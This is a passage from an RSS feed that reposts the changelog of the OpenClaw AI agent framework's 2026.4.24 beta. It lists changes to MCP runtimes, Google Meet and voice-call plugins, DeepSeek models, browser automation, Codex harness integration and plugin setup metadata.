<li>MCP: retire one-shot embedded bundled MCP runtimes at run end, skip bundle-MCP startup when a runtime tool allowlist cannot reach bundle-MCP tools, and add <code>mcp.sessionIdleTtlMs</code> idle eviction for leaked session runtimes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323105025" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71106" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71106/hovercard" href="https://github.com/openclaw/openclaw/issues/71106">#71106</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323140457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71110" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71110/hovercard" href="https://github.com/openclaw/openclaw/issues/71110">#71110</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312378990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70389" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70389/hovercard" href="https://github.com/openclaw/openclaw/issues/70389">#70389</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319231374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70808" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70808/hovercard" href="https://github.com/openclaw/openclaw/issues/70808">#70808</a>.</li>
<li>MCP/config reload: hot-apply <code>mcp.*</code> changes by disposing cached session MCP runtimes, and dispose bundled MCP runtimes during gateway shutdown so removed <code>mcp.servers</code> entries reap child processes promptly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203179674" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60656/hovercard" href="https://github.com/openclaw/openclaw/issues/60656">#60656</a>.</li>
<li>Gateway/restart continuation: durably hand restart continuations to a session-delivery queue before deleting the restart sentinel, recover queued continuation work after crashy restarts, and fall back to a session-only wake when no channel route survives reboot. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318942406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70780" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70780/hovercard" href="https://github.com/openclaw/openclaw/pull/70780">#70780</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Agents/tool-result pruning: harden the tool-result character estimator and context-pruning loops against malformed <code>{ type: "text" }</code> blocks created by void or undefined tool handler results, serializing non-string text payloads for size accounting so they cannot bypass trimming as zero-sized. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4024106459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/34979" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/34979/hovercard" href="https://github.com/openclaw/openclaw/issues/34979">#34979</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4110037760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51267" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51267/hovercard" href="https://github.com/openclaw/openclaw/pull/51267">#51267</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cgdusek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cgdusek">@cgdusek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alvinttang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alvinttang">@alvinttang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coffeexcoin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coffeexcoin">@coffeexcoin</a>.</li>
<li>Daemon/service-env: add Nix Home Manager profile bin directories to generated gateway service PATHs on macOS and Linux, honoring <code>NIX_PROFILES</code> right-to-left precedence and falling back to <code>~/.nix-profile/bin</code> when unset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067523684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44402" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44402/hovercard" href="https://github.com/openclaw/openclaw/issues/44402">#44402</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197325860" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59935" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59935/hovercard" href="https://github.com/openclaw/openclaw/pull/59935">#59935</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jerome-benoit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jerome-benoit">@jerome-benoit</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.24-beta.1]]></title>
<description><![CDATA[2026.4.24
Highlights

Google Meet joins OpenClaw as a bundled participant plugin, with personal Google auth, Chrome/Twilio realtime sessions, paired-node Chrome support, artifact/attendance exports, and recovery tooling for already-open Meet tabs.
DeepSeek V4 Flash and V4 Pro are in the bundled c...]]></description>
<link>https://tsecurity.de/de/3463737/downloads/openclaw-2026424-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3463737/downloads/openclaw-2026424-beta1/</guid>
<pubDate>Sat, 25 Apr 2026 11:45:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.24</h2>
<h3>Highlights</h3>
<ul>
<li>Google Meet joins OpenClaw as a bundled participant plugin, with personal Google auth, Chrome/Twilio realtime sessions, paired-node Chrome support, artifact/attendance exports, and recovery tooling for already-open Meet tabs.</li>
<li>DeepSeek V4 Flash and V4 Pro are in the bundled catalog, V4 Flash is the onboarding default, and DeepSeek thinking/replay behavior is fixed for follow-up tool-call turns.</li>
<li>Talk, Voice Call, and Google Meet can use realtime voice loops that consult the full OpenClaw agent for deeper tool-backed answers.</li>
<li>Browser automation gets coordinate clicks, longer default action budgets, per-profile headless overrides, and steadier tab reuse/recovery.</li>
<li>Plugin and model infrastructure is lighter at startup: static model catalogs, manifest-backed model rows, lazy provider dependencies, and external runtime-dependency repair for packaged installs.</li>
</ul>
<h3>Breaking</h3>
<ul>
<li>Plugin SDK/tool-result transforms: remove the Pi-only <code>api.registerEmbeddedExtensionFactory(...)</code> compatibility path. Bundled tool-result rewrites must use <code>api.registerAgentToolResultMiddleware(...)</code> with <code>contracts.agentToolResultMiddleware</code> declaring the targeted harnesses, so transforms run consistently across Pi and Codex app-server dynamic tools. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Control UI/Talk: add browser WebRTC realtime voice sessions backed by OpenAI Realtime, with Gateway-minted ephemeral client secrets and <code>openclaw_agent_consult</code> handoff to the full OpenClaw agent.</li>
<li>Plugins/Google Meet: add a bundled participant plugin with personal Google auth, explicit meeting URL joins, Chrome and Twilio realtime transports, paired-node <code>chrome-node</code> support for Parallels-style Chrome/BlackHole/SoX hosts, and full-agent consults inside live voice sessions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318644218" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70765" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70765/hovercard" href="https://github.com/openclaw/openclaw/pull/70765">#70765</a>)</li>
<li>Plugins/Google Meet: add artifact and attendance workflows for conference records, recordings, transcripts, smart notes, and participant sessions, including markdown/file output, latest-record lookup, and <code>--all-conference-records</code> history scans.</li>
<li>Plugins/Google Meet: add OAuth and browser-state doctor/recovery flows, including <code>googlemeet doctor --oauth</code> and <code>recover_current_tab</code>/<code>recover-tab</code> so agents can inspect already-open Meet tabs without opening duplicates.</li>
<li>Plugins/Voice Call: expose the shared <code>openclaw_agent_consult</code> realtime tool so live phone calls can ask the full OpenClaw agent for deeper/tool-backed answers.</li>
<li>Plugins/Voice Call: add <code>voicecall setup</code> and a dry-run-by-default <code>voicecall smoke</code> command so Twilio/provider readiness can be checked before placing a live test call.</li>
<li>Providers/Google: add a Gemini Live realtime voice provider for backend Voice Call and Google Meet audio bridges, with bidirectional audio and function-call support.</li>
<li>Providers/Google: let Gemini TTS prepend configured <code>audioProfile</code> and <code>speakerName</code> prompt text for reusable speech style control. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tdack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tdack">@tdack</a>.</li>
<li>Gateway/VoiceClaw: add a realtime brain WebSocket endpoint backed by Gemini Live, with owner-auth gating and async OpenClaw tool handoff. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320479428" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70938" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70938/hovercard" href="https://github.com/openclaw/openclaw/pull/70938">#70938</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yagudaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yagudaev">@yagudaev</a>.</li>
<li>Control UI: refine the agent Tool Access panel with compact live-tool chips, collapsible tool groups, direct per-tool toggles, and clearer runtime/source provenance. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327117266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71405" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71405/hovercard" href="https://github.com/openclaw/openclaw/pull/71405">#71405</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Control UI/chat: add a Steer action on queued messages so a browser follow-up can be injected into the active run without retyping it.</li>
<li>Browser: add viewport coordinate clicks for managed and existing-session automation, plus <code>openclaw browser click-coords</code> for CLI use. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134969636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54452" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54452/hovercard" href="https://github.com/openclaw/openclaw/pull/54452">#54452</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dluttz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dluttz">@dluttz</a>.</li>
<li>Browser: add <code>browser.actionTimeoutMs</code> and use a 60s default action budget so healthy long browser waits do not fail at the client transport boundary. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4219036887" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62589" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62589/hovercard" href="https://github.com/openclaw/openclaw/pull/62589">#62589</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyylin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyylin">@andyylin</a>.</li>
<li>Browser/config: support per-profile <code>browser.profiles.&lt;name&gt;.headless</code> overrides for locally launched browser profiles, so one profile can run headless without forcing all browser profiles headless. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nakamotoliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nakamotoliu">@nakamotoliu</a>.</li>
<li>Matrix: require full cross-signing identity trust for self-device verification and add <code>openclaw matrix verify self</code> so operators can establish that trust from the CLI. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312554425" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70401" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70401/hovercard" href="https://github.com/openclaw/openclaw/pull/70401">#70401</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Gradium: add a bundled text-to-speech provider with voice-note and telephony output support. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245444223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64958" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64958/hovercard" href="https://github.com/openclaw/openclaw/pull/64958">#64958</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LaurentMazare/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LaurentMazare">@LaurentMazare</a>.</li>
<li>Memory-core/hybrid search: expose raw <code>vectorScore</code> and <code>textScore</code> alongside the combined <code>score</code> on hybrid memory search results, so callers can inspect vector-versus-text retrieval contribution before temporal decay or MMR reordering. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283516638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68166" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68166/hovercard" href="https://github.com/openclaw/openclaw/issues/68166">#68166</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285494914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68286" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68286/hovercard" href="https://github.com/openclaw/openclaw/pull/68286">#68286</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ajfonthemove/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ajfonthemove">@ajfonthemove</a>.</li>
<li>Dependencies/memory: stop installing <code>node-llama-cpp</code> by default; local embeddings now load it only when operators install the optional runtime package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/DeepSeek: add DeepSeek V4 Flash and V4 Pro to the bundled catalog and make V4 Flash the onboarding default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lsdsjy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lsdsjy">@lsdsjy</a>.</li>
<li>Dependencies/Pi: update bundled Pi packages to <code>0.70.2</code>, use Pi's upstream <code>gpt-5.5</code> and DeepSeek V4 catalog metadata, and keep only local <code>gpt-5.5-pro</code> forward-compat handling. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lsdsjy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lsdsjy">@lsdsjy</a>.</li>
<li>Models/CLI: speed up model listing with safe static catalogs for bundled providers, narrower row-source orchestration, and less broad registry enumeration for default <code>openclaw models list</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316688472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70632" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70632/hovercard" href="https://github.com/openclaw/openclaw/pull/70632">#70632</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320069810" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70883" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70883/hovercard" href="https://github.com/openclaw/openclaw/pull/70883">#70883</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319881960" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70867" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70867/hovercard" href="https://github.com/openclaw/openclaw/pull/70867">#70867</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Models/commands: deprecate <code>/models add</code> so chat attempts now return a deprecation message instead of writing model configuration, and remove the add action from <code>/models</code> provider menus. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324345819" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71175" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71175/hovercard" href="https://github.com/openclaw/openclaw/pull/71175">#71175</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Models/catalog: add manifest-sourced model rows, duplicate provider/model conflict reporting, and shared <code>src/model-catalog</code> normalization for provider index, cache, onboarding, and listing consumers without loading provider runtime. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326811965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71368" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71368/hovercard" href="https://github.com/openclaw/openclaw/pull/71368">#71368</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326746997" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71360/hovercard" href="https://github.com/openclaw/openclaw/pull/71360">#71360</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Codex harness/context-engine: run context-engine bootstrap, assembly, post-turn maintenance, and engine-owned compaction in Codex app-server sessions while keeping native Codex thread state and compaction auditable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319234861" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70809" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70809/hovercard" href="https://github.com/openclaw/openclaw/pull/70809">#70809</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>Codex runtime plan: consolidate contract-first Pi/Codex parity coverage and accept legacy Codex auth-provider aliases in app-server profile login and refresh paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322908293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71096" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71096/hovercard" href="https://github.com/openclaw/openclaw/pull/71096">#71096</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Codex harness: bridge Codex-native tool hooks into OpenClaw plugin hooks and approvals, with bounded relay payloads and approval spam protection. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321481985" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71008/hovercard" href="https://github.com/openclaw/openclaw/pull/71008">#71008</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Plugin SDK/Codex harness: add provider-owned transport/auth/follow-up seams and harness result classification so Codex-style runtimes can participate in fallback policy without core special-casing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318822832" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70772/hovercard" href="https://github.com/openclaw/openclaw/pull/70772">#70772</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>Gateway/nodes: add disabled-by-default <code>gateway.nodes.pairing.autoApproveCidrs</code> for first-time node pairing from explicit trusted CIDRs, while keeping operator/browser pairing and all upgrade flows manual. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204474919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60800/hovercard" href="https://github.com/openclaw/openclaw/issues/60800">#60800</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>WebChat/sessions: keep runtime-only prompt context out of visible transcript history and scrub legacy wrappers from session history surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/91wan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/91wan">@91wan</a>.</li>
<li>Agents/bootstrap: add <code>agents.defaults.contextInjection: "never"</code> to disable workspace bootstrap file injection for agents that fully own their prompt lifecycle. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245734712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65006" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65006/hovercard" href="https://github.com/openclaw/openclaw/pull/65006">#65006</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xDarkicex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xDarkicex">@xDarkicex</a>.</li>
<li>Plugins/manifest: add a <code>modelCatalog</code> contract for provider-owned model rows, aliases, suppression rules, and discovery mode metadata without loading plugin runtime. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326617030" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71342" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71342/hovercard" href="https://github.com/openclaw/openclaw/pull/71342">#71342</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/setup: honor explicit <code>setup.requiresRuntime: false</code> as a descriptor-only setup contract while keeping omitted values on the legacy setup-api fallback path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/setup: report descriptor/runtime drift when setup-api registrations disagree with <code>setup.providers</code> or <code>setup.cliBackends</code>, without rejecting legacy setup plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/setup: include <code>setup.providers[].envVars</code> in generic provider auth/env lookups and warn non-bundled plugins that still rely on deprecated <code>providerAuthEnvVars</code> compatibility metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/setup: derive generic provider setup choices from descriptor-safe <code>setup.providers[].authMethods</code> before falling back to setup runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/setup: surface manifest provider auth choices directly in provider setup flow before falling back to setup runtime or install-catalog choices. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/setup: warn when descriptor-only setup plugins still ship ignored setup runtime entries, keeping <code>setup.requiresRuntime: false</code> semantics explicit without breaking existing metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: use manifest <code>channelConfigs</code> for read-only external channel discovery when no setup entry is available or setup descriptors declare runtime unnecessary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin hooks: expose first-class run, message, sender, session, and trace correlation fields on message hook contexts and run lifecycle events. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/PDF: move local PDF extraction into a bundled <code>document-extract</code> plugin so core no longer owns <code>pdfjs-dist</code> or PDF image-rendering dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Providers/Anthropic Vertex: move the Vertex SDK runtime behind the bundled provider plugin so core no longer owns that provider-specific dependency. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/activation: expose activation plan reasons and a richer plan API so callers can inspect why a plugin was selected while preserving existing id-list activation behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320586898" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70943/hovercard" href="https://github.com/openclaw/openclaw/pull/70943">#70943</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/source metadata: expose normalized install-source facts on provider and channel catalogs so onboarding can explain npm pinning, integrity state, and local availability before runtime loads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320712575" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70951" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70951/hovercard" href="https://github.com/openclaw/openclaw/pull/70951">#70951</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/catalog: pin the official external WeCom channel source to an exact npm release plus dist integrity, with a guard that official external sources stay integrity-pinned. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321364579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70997" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70997/hovercard" href="https://github.com/openclaw/openclaw/pull/70997">#70997</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/source metadata: warn when <code>openclaw.install.defaultChoice</code> is invalid or points at a missing source, keeping catalog diagnostics explicit without breaking existing plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/source metadata: warn when <code>openclaw.install.expectedIntegrity</code> is present without a valid npm source, keeping orphaned integrity metadata visible without rejecting existing plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
